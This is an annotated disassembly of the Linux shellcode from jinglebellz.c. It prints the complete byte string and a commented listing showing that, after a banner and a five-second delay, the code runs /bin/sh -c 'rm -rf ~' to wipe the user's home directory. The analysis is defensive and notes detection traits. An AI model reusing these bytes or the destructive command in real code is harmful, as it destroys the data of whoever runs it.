;
; disassemble & decode of gobbles linux_shellcode from jinglebellz.c
; Jirka Kosina & Tomas Kouba
;
; Analyst summary (derived from the listing below, not from external sources):
;   - nothing is encoded or obfuscated: "rm -rf ~", "/bin/sh" and "-c" are
;     pushed to the stack as plaintext immediates, so the byte string is
;     trivially matched by the ASCII of those pushes and by the
;     write / nanosleep / execve int $0x80 sequence;
;   - the only syscalls used are write (4), nanosleep (0xa2), execve (0xb)
;     and exit (1); stdout is never touched, both writes go to fd 2 (stderr);
;   - the destructive action is the execve at the end; everything before it
;     is a 5 x 1 second delay that writes "pP" to stderr on each pass.
;
;"\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
;"\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43"
;"\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35"
;"\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72"
;"\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0"
;"\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66"
;"\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
;"\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd"
;"\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31"
;"\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58"
;"\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41"
;"\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69"
;"\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23"
;"\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31"
;"\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb"
;"\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd"
;"\x80\x31\xdb\x31\xc0\x40\xcd\x80";
;
; NOTE(review): the byte string begins with \x31\xdb (xor %ebx,%ebx); the
; leading "xor %eax,%eax" in the listing below is not part of the bytes.
; It is harmless to the decode (eax is cleared again right after the push).
;
; This shellcode
;
; 1) writes the banner "rm -rf ~ in 5 seconds.. CTRL-c to abort" to stderr
; 2) calls nanosleep() for 1 second 5 times, writing "pP" to stderr before
;    each sleep
;    (interrupting nanosleep only shortens the current sleep; the loop
;    counter is decremented regardless of the return value, so the cycle
;    lasts at most 5 seconds and nothing is aborted. No signal handler is
;    installed here, so whether CTRL-c interrupts the sleep or terminates
;    the host process depends on the host's SIGINT disposition - confirm)
; 3) after this waiting cycle is done, it performs "rm -rf ~" through
;    execve() syscall, running /bin/sh -c with an EMPTY environment
;    (see the envp note at the execve below)
;

; ---- stage 1: banner to stderr ----------------------------------------
xor %eax,%eax
xor %ebx,%ebx
xor %ecx,%ecx
xor %edx,%edx
mov $0x3b,%al
push %eax                ; pushes ';' + three NUL bytes: a terminator
                         ; that lands right after the banner text
xor %eax,%eax
push $0xa74726f          ; "ort\n"   (little-endian: 6f 72 74 0a)
push $0x6261206f         ; "o ab"
push $0x7420632d         ; "-c t"
push $0x4c525443         ; "CTRL"
push $0x202e2e73         ; "s.. "
push $0x646e6f63         ; "cond"
push $0x65732035         ; "5 se"
push $0x206e6920         ; " in "
push $0x7e206672         ; "rf ~"
push $0x2d206d72         ; "rm -"
mov $0x2,%bl             ; fd = 2 (stderr)
mov %esp,%ecx            ; buf = "rm -rf ~ in 5 seconds.. CTRL-c to abort\n;"
mov $0x29,%dl            ; count = 41 = 40 bytes of banner (incl. "\n")
                         ; plus the ';' pushed first
mov $0x4,%al             ; 4 = sys_write
int $0x80                ; sys_write(2, "rm -rf ~ in 5 seconds.. CTRL-c to abort\n;", 41)

; ---- stage 2: 5 x (write "pP", sleep 1s) ------------------------------
xor %eax,%eax
xor %edi,%edi
mov $0x5,%al
mov %eax,%edi            ; edi = 5 = loop counter
xor %eax,%eax            ; LOOP HEAD: this is the target of the "jne" below
xor %ebx,%ebx
xor %ecx,%ecx
xor %edx,%edx
mov $0x5070,%dx
push %edx                ; "pP\0\0" on the stack (70 50 00 00)
mov $0x2,%bl             ; fd = 2 (stderr)
mov %esp,%ecx            ; buf = "pP"
xor %edx,%edx
mov $0x2,%dl             ; count = 2
mov $0x4,%al             ; 4 = sys_write
int $0x80                ; sys_write(2, "pP", 2)
xor %eax,%eax
xor %ebx,%ebx
xor %ecx,%ecx            ; eax = ebx = ecx = 0
push %eax                ; tv_nsec = 0
inc %eax
push %eax                ; tv_sec  = 1
mov %esp,%ebx            ; ebx = &(struct timespec){1, 0}
mov $0xa2,%al            ; 0xa2 = 162 = sys_nanosleep
int $0x80                ; sys_nanosleep(&{1,0}, NULL)  (ecx = rem = NULL)
                         ; the 12 bytes pushed per iteration are never
                         ; popped; harmless for 5 iterations
dec %edi                 ; edi--  (decremented whether or not the sleep
                         ; completed, so an interrupted sleep is not retried)
xor %eax,%eax
cmp %eax,%edi
jne 0x804a1f1            ; while (edi != 0) goto LOOP HEAD; the absolute
                         ; address is an artefact of where the disassembler
                         ; loaded the bytes, the real encoding is a short
                         ; relative jump (75 d1)

; ---- stage 3: execve("/bin/sh", ["/bin/sh","-c","rm -rf ~"], []) -------
xor %ebx,%ebx
xor %ecx,%ecx
xor %edx,%edx
push $0x587e2066         ; "f ~X"   esp+0x20  (X at 0x23 becomes NUL)
push $0x722d206d         ; "m -r"   esp+0x1c
push $0x7258632d         ; "-cXr"   esp+0x18  (X at 0x1a becomes NUL)
push $0x41414141         ; "AAAA"   esp+0x14  placeholder -> argv[3] / envp[0]
push $0x41414141         ; "AAAA"   esp+0x10  placeholder -> argv[2]
push $0x41414141         ; "AAAA"   esp+0x0c  placeholder -> argv[1]
push $0x41414141         ; "AAAA"   esp+0x08  placeholder -> argv[0]
push $0x4368732f         ; "/shC"   esp+0x04  (C at 0x07 becomes NUL)
push $0x6e69622f         ; "/bin"   esp+0x00
                         ; stack now reads: /bin/shCAAAAAAAAAAAAAAAA-cXrm -rf ~X
xor %eax,%eax
mov %al,0x7(%esp,1)      ; NUL-terminate "/bin/sh"  (replaces 'C')
mov %al,0x1a(%esp,1)     ; NUL-terminate "-c"       (replaces first 'X')
mov %al,0x23(%esp,1)     ; NUL-terminate "rm -rf ~" (replaces last 'X')
mov %esp,0x8(%esp,1)     ; argv[0] = esp      = "/bin/sh"
xor %ebx,%ebx
lea 0x18(%esp,1),%ebx    ; ebx = esp+0x18     = "-c"
mov %ebx,0xc(%esp,1)     ; argv[1] = "-c"
xor %ebx,%ebx
lea 0x1b(%esp,1),%ebx    ; ebx = esp+0x1b     = "rm -rf ~"
mov %ebx,0x10(%esp,1)    ; argv[2] = "rm -rf ~"
mov %eax,0x14(%esp,1)    ; argv[3] = NULL -- eax is still 0 here (the
                         ; original annotation "rm address" was wrong;
                         ; the rm address lives in ebx, not eax)
xor %ebx,%ebx            ; ebx = 0
mov %esp,%ebx            ; ebx = filename = esp = "/bin/sh"
lea 0x8(%esp,1),%ecx     ; ecx = argv = esp+0x08
xor %edx,%edx
lea 0x14(%esp,1),%edx    ; edx = envp = esp+0x14, i.e. the NULL just stored:
                         ; the environment is EMPTY ({NULL}), it does not
                         ; contain "rm -rf ~" as the original comment said
mov $0xb,%al             ; 0xb = 11 = sys_execve
int $0x80                ; execve("/bin/sh", {"/bin/sh", "-c", "rm -rf ~", NULL}, {NULL})

; ---- only reached if execve fails ------------------------------------
xor %ebx,%ebx            ; ebx = exit status = 0
xor %eax,%eax
inc %eax                 ; 1 = sys_exit
int $0x80                ; sys_exit(0)